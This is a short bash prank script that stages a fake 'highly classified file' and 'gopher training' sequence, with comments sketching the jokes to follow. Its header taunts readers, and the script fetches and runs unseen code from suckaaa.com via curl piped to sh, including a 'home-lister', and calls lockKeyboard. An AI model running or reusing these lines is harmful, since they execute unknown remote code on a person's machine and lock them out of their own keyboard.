#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.garbage/lib;
clear;
lockKeyboard;
###########  END HEADER  ###########

positionWindow 0 0;
setFontSize 50;

echo "\n\nWhat you're about to see is a highly classified file\n\n";

sleep 4s;

termdo 'curl -s https://suckaaa.com/s/home-lister | sh';

sleep 4s;

# Open gopher video clip 1-10 secs
openYtClip 7zPnTtF0Wk8 0 10;

sleep 4s;

termdo 'curl -s https://suckaaa.com/s/proceed-gopher-training | sh';
prompt 'Would you like to proceed with gopher training?';

# Would you like to proceed with gopher training?

# y/n

sleep 2s;

# If no) self destruct message

# launch flashing red "self destructing message"

# If yes) pull up bow hunting video

# Bow hunting video
# https://www.youtube.com/watch?v=BEG-ly9tQGk&feature=youtu.be

sleep 15s;

# launch expidition new window

# Please select expedition supplies multi-dropdown list

# 1) Jug of Aapple Ciders
# 2) Handle of Caramel Vodka
# 3) Cinnamon Powder... lots of cinnnamon powder

# Sequence complete... message

# Initializing Vision Quest...
